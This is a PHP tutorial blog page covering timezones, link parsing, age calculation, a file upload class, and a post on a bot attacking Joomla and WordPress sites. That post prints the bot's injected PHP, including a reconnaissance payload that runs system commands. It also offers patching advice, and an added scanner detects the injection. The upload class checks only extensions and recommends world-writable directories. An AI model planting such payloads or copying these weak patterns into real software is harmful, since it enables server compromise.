Words from Alejandro U. Alvarez
Posts tagged php
Display timezone-specific dates in PHP
Apr 17th
It's common to have a website designed for one country (Spain or the UK, for example) and host it on a server elsewhere (in the US, for example). You will notice that sometimes, when displaying a date this way, it shows the local time at the server!
Instead of manually correcting this time difference there is a much safer way of getting around this issue, using built-in PHP functions.
Take a look at this:
```php
<?php
$timezone = new DateTimeZone("Europe/Madrid"); // the zone you want to display
$date = new DateTime();                         // "now" in the server's default zone
$date->setTimezone($timezone);                  // convert it to Madrid time
echo $date->format('H:ia (D, M jS, Y)');
?>
```
Which would generate the following output (at the time of writing, of course!):
22:52pm (Sat, Apr 17th, 2010)
As you can see it is extremely easy to set up new timezones and to display dates for those zones specifically. You could even prompt your users for their own timezone, or add it as a per-user setting.
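As an added example (not code from the post), the per-user version of the same idea: timestamps stay in UTC and are rendered in whichever zone the user picked, with the identifier checked against PHP's own list so a mistyped or tampered setting falls back instead of throwing. The fallback zone and the sample time are assumptions.

```php
<?php
// Added example, not from the post: keep timestamps in UTC and render them in
// the zone each user chose. The fallback zone and the sample time are assumptions.

function formatForUser($utcTimestamp, $tzName, $fallback = 'UTC') {
    // Validate against PHP's own identifier list: anything unknown falls back
    // to a known zone rather than throwing on new DateTimeZone()
    if (!in_array($tzName, DateTimeZone::listIdentifiers(), true)) {
        $tzName = $fallback;
    }
    $date = new DateTime('@' . $utcTimestamp);    // '@' = seconds since the UTC epoch
    $date->setTimezone(new DateTimeZone($tzName));
    return $date->format('H:i (D, M jS, Y) T');   // T appends the zone abbreviation
}

// Constructed sample: 2010-04-17 20:52 UTC, shown for three user settings
$when = gmmktime(20, 52, 0, 4, 17, 2010);
foreach (['Europe/Madrid', 'America/New_York', 'Not/AZone'] as $userTz) {
    echo str_pad($userTz, 18), formatForUser($when, $userTz), "\n";
}
```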
New threat for all Joomla and WordPress installations
Sep 24th
There is a new bot out there, and it is one of the bad ones. I started receiving traffic from it on my servers over the past week, and after some investigation it turns out to be quite a powerful bot, and so simple to use that even a kid with a computer could run it.
The bot attacks mainly Joomla and WordPress installations; version 1.6.2 of the Firestats plugin for WordPress has a known vulnerability that this bot exploits.
If it succeeds, the bot will usually get your admin password and send it to a server somewhere; other versions f** your server up... it depends.
The bot is basically a top all-in-one product that acts as a:
- RFI Scanner
- RFI Scan & Exploit
- Joomla RFI Scan & Exploit
- Milw0rm Search
- Google bypass
- Message Spy & Save
- Auto Spreading
The last known spreader for the bot is the Fx29Spreadz v1.0 (Apr. 2009) which can be used from a server with a PHP Shell.
IPs and servers:
This bot has used the following IPs and hosts (that I know of):
It has compromised servers in the Republic of Korea, Taiwan and some other countries.
Injections:
The bot basically tries to insert the following PHP line:
```php
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
```
Although there is another variation which inserts:
```php
<?php
function ConvertBytes($number) {
    $len = strlen($number);
    if($len < 4) {
        return sprintf("%d b", $number); }
    if($len >= 4 && $len <= 6) {
        return sprintf("%0.2f Kb", $number/1024); }
    if($len >= 7 && $len <= 9) {
        return sprintf("%0.2f Mb", $number/1024/1024); }
    return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here and also is a fucking gay..";
echo "uname -a: $un";
echo "os: $os";
echo "id: $id1";
echo "free: $free";
echo "used: $used";
echo "total: $all";
exit;
```
Security recommendations:
If your website runs on WordPress, Joomla, Drupal or another popular CMS, you must upgrade all plugins and check for the latest version of the system!
If you have Firestats, I recommend deactivating it for some time, until a new version fixing that bug is released, and even then I would wait.
If you have URL rewriting systems, ensure they are up to date; if you built them yourself, re-check their security, and never include external files.
Hope this helped you.
If you found any variations or new facts about this, please comment below.
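As an added example (not from the post), a small script that checks a server for the two injections shown above, using their marker strings, and reports whether PHP is still configured to include() remote URLs, which is what the bot's RFI attacks depend on. The scan root is an assumption; keep the script outside the web root, since it contains the marker strings itself.

```php
<?php
// Added example, not from the post: look for files carrying the markers of the
// injections above (Fx29ID / FeeLCoMz / Osirys) and check allow_url_include.
// The default scan root is an assumption.

const MARKERS = ['Fx29ID', 'FeeL"."CoMz', 'FeeLCoMz', 'Osirys'];

// Returns [path => [marker, ...]] for every file containing at least one marker.
function scanForInjection($root, array $markers = MARKERS) {
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile() || $file->getSize() > 5 * 1024 * 1024) {
            continue;                                    // skip large binaries
        }
        $body = file_get_contents($file->getPathname());
        if ($body === false) {
            continue;                                    // unreadable: skip
        }
        $found = array_values(array_filter($markers,
            fn ($m) => strpos($body, $m) !== false));
        if ($found) {
            $hits[$file->getPathname()] = $found;
        }
    }
    return $hits;
}

// Remote file inclusion only works when include() is allowed to fetch URLs.
function remoteIncludeAllowed() {
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

$root = isset($argv[1]) ? $argv[1] : '/var/www/html';   // assumption: web root
foreach (scanForInjection($root) as $path => $markers) {
    echo "SUSPECT $path : ", implode(', ', $markers), "\n";
}
echo 'allow_url_include is ', remoteIncludeAllowed() ? "ON (turn it off in php.ini)\n" : "off\n";
```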
Parse links in user comments
Sep 13th
When you allow users to comment and post things on your website, it is interesting and useful to let them post links and other content. But how can we do so easily?
Sure, there is BBCode, phpBB, allowing only some HTML tags... etc., but how easy is this approach for the end user? Of course some users will be familiar with BBCode or with HTML, and others will be curious enough to learn how to use it, but most won't. And we want all our users to be able to do so.
The solution: URL Parsing
How about this: They simply post the URL of whatever they want to include (A link, a picture, a YouTube video... ) and we detect that, and take the corresponding action.
First of all we need something that detects links; I have written a simple regexp to do so:
```php
function parse($text) {
    // Match http(s) URLs and hand each one to parseURL()
    return preg_replace_callback(
        '@(https?://([-\w\.]+)+(:\d+)?(/([\w/_\.-]*(\?\S+)?)?)?)@',
        'parseURL',
        $text
    );
}
```
This is valid for almost all URLs, as long as they begin with http. Whenever a URL is found, this function calls a callback function, parseURL, which then takes care of the URL.
parseURL
Now that the URL is found, we need to take care of it. preg_replace_callback passes the callback an array of matches; the full URL is its first element:
```php
function parseURL($url) {
    $link = $url[0];   // element 0 of the matches array is the complete URL
    // ... the rest of the function is built up below
```
We will parse the full url with a built-in function called parse_url(), which will return the following data:
- scheme - e.g. http
- host
- port
- user
- pass
- path
- query - after the question mark ?
- fragment - after the hashmark #
To get the file format we will check the extension:
```php
    $url = parse_url($link);   // the pieces listed above
    $ext = isset($url['path']) ? substr(strrchr($url['path'], '.'), 1) : '';   // text after the last dot
```
Image formats:
```php
    $imgs = array('jpg', 'jpeg', 'gif', 'png', 'tif'); // You can write more if you want, this is only an example
```
Now let's check if it is or not an image:
```php
    if (in_array($ext, $imgs)) {
        // htmlspecialchars() keeps characters in the URL from closing the attribute
        return '<img src="' . htmlspecialchars($link, ENT_QUOTES) . '" alt="This is a picture" class="insertedPic" />';
    }
```
This way if a user inserts a link to a picture, the picture is displayed. You can now add a link, or change in any way the result of this.
If it is a YouTube video it would also be good to embed it, so we will first check if it is:
```php
    // Check for a youtube video (eregi() is gone in PHP 7, so preg_match() is used)
    if (isset($url['host']) && preg_match('/^(www\.)*(youtube\.).{2,3}$/i', $url['host'])) {
        return youtubeEmbed(isset($url['query']) ? $url['query'] : '');
    }
```
As you can see, if the link comes from youtube, we will embed it using our custom function youtubeEmbed:
youtubeEmbed()
```php
function youtubeEmbed($params) {
    parse_str($params, $q);                 // the query string, e.g. v=VIDEOID
    $v = isset($q['v']) ? $q['v'] : '';
    if (substr($v, strlen($v) - 3, 3) == '<br') {   // strip a trailing <br left by nl2br()
        $v = substr($v, 0, strlen($v) - 3);
    }
    // Only accept the characters a video id can contain, so $v cannot break out of the markup
    if ($v !== '' && preg_match('/^[\w-]+$/', $v)) {
        return '<div class="addedLink"><object width="200px" height="150px" style="display:block; z-index:1">'
             . '<param name="movie" value="http://www.youtube.com/v/' . $v . '"></param>'
             . '<param name="allowFullScreen" value="true"></param>'
             . '<param name="wmode" value="transparent"></param>'
             . '<param name="allowscriptaccess" value="always"></param>'
             . '<embed src="http://www.youtube.com/v/' . $v . '&rel=1&color1=0xFFFFFF&color2=0x666666&border=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="200" height="150" wmode="transparent"></embed>'
             . '</object></div>';
    } else {
        return false;
    }
}
```
I won't go into too much detail here, it is quite simple: we take the parameter $v, which is the video ID, and then we proceed to the video embed... You can do the same with Metacafe, Vimeo, College Humor, Google Video... etc., and the process would be basically the same for all.
Further uses
I use this class to detect internal links on some of my websites. If the link points to a page with a picture, for example, I show a small version of it; if it points to a user profile I show the user's name and some data... etc. The options are endless, and once you have everything parsed it is very easy to add new stuff. It really makes it simple for users to share pictures and videos, and it is the safest way of doing so, as well as the best way if you ever want to change the behavior, since all you store in the database is the raw URL.
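As an added example (not the post's own code), the whole approach above assembled into one renderer: the comment is split into text and URL chunks, the text chunks are escaped, and each URL is parsed and turned into an image, a YouTube embed or a plain link, with every value escaped before it is placed in an attribute. The sample comment is constructed.

```php
<?php
// Added example, not from the post: renders a user comment to HTML, turning bare
// URLs into images, YouTube embeds or plain links. The sample comment is constructed.

const URL_RE     = '@(https?://[-\w.]+(?::\d+)?(?:/[^\s<>"\']*)?)@i';
const IMAGE_EXTS = ['jpg', 'jpeg', 'gif', 'png', 'tif'];

function esc($s) {
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function renderUrl($link) {
    $u = parse_url($link);
    if ($u === false || empty($u['host'])) {
        return esc($link);                            // unparsable: plain text
    }
    $host = strtolower($u['host']);
    $ext  = strtolower(pathinfo(isset($u['path']) ? $u['path'] : '', PATHINFO_EXTENSION));

    // YouTube: exact host match, and the id may only contain id characters
    if (in_array($host, ['youtube.com', 'www.youtube.com'], true)) {
        parse_str(isset($u['query']) ? $u['query'] : '', $q);
        if (isset($q['v']) && preg_match('/^[A-Za-z0-9_-]+$/', $q['v'])) {
            return '<iframe width="200" height="150" src="https://www.youtube.com/embed/'
                 . esc($q['v']) . '" allowfullscreen></iframe>';
        }
    }
    if (in_array($ext, IMAGE_EXTS, true)) {
        return '<img src="' . esc($link) . '" alt="user picture" class="insertedPic" />';
    }
    return '<a href="' . esc($link) . '" rel="nofollow">' . esc($link) . '</a>';
}

function renderComment($text) {
    // DELIM_CAPTURE gives [text, url, text, url, ...]: even indexes are escaped
    // as text, odd indexes are URLs. nl2br() runs last, so no "<br" ends up in a URL.
    $parts = preg_split(URL_RE, $text, -1, PREG_SPLIT_DELIM_CAPTURE);
    $html = '';
    foreach ($parts as $i => $chunk) {
        $html .= ($i % 2) ? renderUrl($chunk) : esc($chunk);
    }
    return nl2br($html);
}

$comment = "Look: http://example.com/pics/cat.jpg and https://www.youtube.com/watch?v=abc123XYZ_-\n<b>not bold</b>";
echo renderComment($comment), "\n";
```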
Calculate age in PHP from timestamp
Sep 8th
If you ever wanted to calculate someone's age in PHP from a birth timestamp, you must take into account that the age is more than the number of years, since days and months also matter, so I wrote a simple function that returns the exact age for a given timestamp:
```php
function getAge($birth) {
    $t = time();                                                // current timestamp, fetched once
    $age = ($birth < 0) ? ($t + ($birth * -1)) : $t - $birth;  // seconds lived (negative timestamps are before 1970)
    return floor($age / 31536000);                              // 60*60*24*365 seconds in a year
}
```
Basically we first get the current time and store it in a variable (to avoid having to call time() more than once).
Then we get the age in seconds (taking into account that timestamps before the Unix epoch are negative, hence the ternary operator).
Now that we have the age in seconds, we divide it by the number of seconds in a year (60*60*24*365).
And that is basically it.
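As an added example (not from the post), the same age computed from calendar dates with DateTime::diff(), which handles leap years and the day of the birthday; dividing seconds by a 365-day year drifts by about one day every four years, so it can report a birthday a day early. The sample dates are constructed.

```php
<?php
// Added example, not from the post: whole-years age from calendar dates.
// Constructed sample: born 1990-03-01, checked on the 30th birthday and the day before.

function getAgeExact($birth, $now = null) {
    $utc   = new DateTimeZone('UTC');
    $born  = (new DateTime('@' . $birth))->setTimezone($utc);
    $today = (new DateTime('@' . ($now === null ? time() : $now)))->setTimezone($utc);
    if ($today < $born) {
        throw new InvalidArgumentException('birth timestamp is in the future');
    }
    return $born->diff($today)->y;   // full years elapsed, leap days included
}

function getAgeByDivision($birth, $now) {
    return (int) floor(($now - $birth) / 31536000);   // the post's method: 365-day years
}

$birth = gmmktime(0, 0, 0, 3, 1, 1990);
$day30 = gmmktime(12, 0, 0, 3, 1, 2020);    // 30th birthday
$eve   = gmmktime(12, 0, 0, 2, 29, 2020);   // the day before it
echo 'on the birthday: exact ', getAgeExact($birth, $day30), ', division ', getAgeByDivision($birth, $day30), "\n";
echo 'day before:      exact ', getAgeExact($birth, $eve),   ', division ', getAgeByDivision($birth, $eve), "\n";
```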
Easiest PHP file upload
Aug 7th
Hello people,
I want to share with all of you a file upload class I have developed, that makes it stupid simple to upload files haha
The PHP class:
First of all, here is the PHP class you will need:
```php
<?php
// Uploader class, by Alex
// This class is meant to handle all kinds of file uploads for DJs Music
// Images, music... all here
class Uploader {
    public $maxSize;
    public $allowedExt;
    public $fileInfo = array();

    function config($maxSize, $allowedExt) {
        $this->maxSize = $maxSize;
        $this->allowedExt = $allowedExt;
    }

    // Random string of digits and letters, used for the stored file name
    function generateRandStr($length) {
        $randstr = "";
        for ($i = 0; $i < $length; $i++) {
            $randnum = mt_rand(0, 61);
            if ($randnum < 10) {
                $randstr .= chr($randnum + 48);   // 0-9
            } else if ($randnum < 36) {
                $randstr .= chr($randnum + 55);   // A-Z
            } else {
                $randstr .= chr($randnum + 61);   // a-z
            }
        }
        return $randstr;
    }

    function check($uploadName) {
        if (isset($_FILES[$uploadName])) {
            // Extension is lower-cased so 'JPG' passes a 'jpg' allow list
            $this->fileInfo['ext'] = strtolower(substr(strrchr($_FILES[$uploadName]["name"], '.'), 1));
            $this->fileInfo['name'] = basename($_FILES[$uploadName]["name"]);
            $this->fileInfo['size'] = $_FILES[$uploadName]["size"];
            $this->fileInfo['temp'] = $_FILES[$uploadName]["tmp_name"];
            if ($this->fileInfo['size'] < $this->maxSize) {
                if (strlen($this->allowedExt) > 0) {
                    $exts = explode(',', $this->allowedExt);
                    if (in_array($this->fileInfo['ext'], $exts)) {
                        return true;
                    }
                    echo 'Invalid file extension. Allowed extensions are ' . $this->allowedExt;
                    return false; // failed ext
                }
                echo 'Sorry but there is an error in our server. Please try again later.';
                return false; // no extension list configured: nothing is accepted
            } else {
                if ($this->maxSize < 1000000) {
                    $rsi = round($this->maxSize / 1000, 2) . ' Kb';
                } else if ($this->maxSize < 1000000000) {
                    $rsi = round($this->maxSize / 1000000, 2) . ' Mb';
                } else {
                    $rsi = round($this->maxSize / 1000000000, 2) . ' Gb';
                }
                echo 'File is too big. Maximum allowed size is ' . $rsi;
                return false; // failed size
            }
        }
        echo 'Oops! An unexpected error occurred, please try again later.';
        return false; // Either form not submitted or file/s not found
    }

    function upload($name, $dir, $fname = false) {
        if (!is_dir($dir)) {
            echo 'Sorry but there is an error in our server. Please try again later.';
            return false; // Directory doesn't exist!
        }
        if ($this->check($name)) {
            // Process upload. All info stored in array fileInfo.
            // Dir OK, keep going: get a new filename:
            if (!$fname) {
                $this->fileInfo['fname'] = $this->generateRandStr(15) . '.' . $this->fileInfo['ext'];
            } else {
                $this->fileInfo['fname'] = basename($fname); // a caller-supplied name must not carry a path
            }
            while (file_exists($dir . $this->fileInfo['fname'])) {
                $this->fileInfo['fname'] = $this->generateRandStr(15) . '.' . $this->fileInfo['ext'];
            }
            // Unique name gotten. Move file:
            if (@move_uploaded_file($this->fileInfo['temp'], $dir . $this->fileInfo['fname'])) {
                return true; // Done
            } else {
                echo 'The file could not be uploaded, although everything went ok... Please try again later.';
                return false; // File not moved
            }
        } else {
            return false;
        }
    }
}
// Initialize the object:
$up = new Uploader;
?>
```
Alright, this is the code. You shouldn't have to modify it; simply include it where you process the upload and the class will instantiate itself into the variable $up.
Usage:
For this example I will suppose you have a basic HTML form as follows:
```html
<form action="process.php" method="post" enctype="multipart/form-data">
    <input name="uploadPic" type="file" />
    <input name="upload" type="submit" value="Upload" />
</form>
```
As you can see, the action is process.php, which is, in this example, where the picture upload will be processed.
In the file process.php we will first include the upload handler, then configure it, and finally try to upload the file into the directory pictures/. Please take into account that it must be writable (CHMOD 777)
process.php:
```php
<?php
// include the class:
include('handleUpload.php');
$up->config('2000000', 'jpg,gif,png');
if ($up->upload('uploadPic', 'pictures/')) {
    echo 'File uploaded. File information: ';
    echo $up->fileInfo['ext'] . ' ';
    echo $up->fileInfo['name'] . ' ';
    echo $up->fileInfo['size'];
}
// If the file was not uploaded, the error will have been echoed automatically
?>
```
As you can see there is no }else{ because the handler echoes the errors by itself. You can change this behavior easily by setting up your own function as desired.
In this example we have configured it to allow a maximum of 2000000 bytes per upload, and only jpg, gif, and png pictures.
Now that the file is uploaded you have some information about it in the $up object. The format ($up->fileInfo['ext']), the name ($up->fileInfo['name']), and finally the size in bytes ($up->fileInfo['size']).
The handler also generates a random name, and ensures it is not already in the directory. The new name is stored in the fileInfo array as mentioned above.
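As an added example (not from the post), a process.php that keeps the class's extension check but also confirms the uploaded bytes really are an image of that type before the file is moved, since the extension comes from the client's file name. handleUpload.php and pictures/ are the files from the post; looksLikeImage() is my addition.

```php
<?php
// Added example, not from the post: verify the upload's content, not just its
// extension, before the Uploader class stores it. looksLikeImage() is an addition.
include('handleUpload.php');

// True only when the MIME type read from the file's bytes matches the extension
// it will be stored under, and the file has readable image dimensions.
function looksLikeImage($tmpPath, $ext) {
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'gif' => 'image/gif',  'png' => 'image/png'];
    if (!isset($allowed[$ext])) {
        return false;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    return $mime === $allowed[$ext] && @getimagesize($tmpPath) !== false;
}

$up->config(2000000, 'jpg,jpeg,gif,png');

// The class does not look at $_FILES[...]['error'], so check it first
if (!isset($_FILES['uploadPic']) || $_FILES['uploadPic']['error'] !== UPLOAD_ERR_OK) {
    exit('No file received, or the upload failed.');
}
if (!$up->check('uploadPic')) {
    exit;                                   // the class already printed the reason
}
if (!looksLikeImage($up->fileInfo['temp'], strtolower($up->fileInfo['ext']))) {
    exit('The file is not a ' . $up->fileInfo['ext'] . ' image.');
}
if ($up->upload('uploadPic', 'pictures/')) {
    echo 'Stored as ', $up->fileInfo['fname'];
}
```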
I hope you found this useful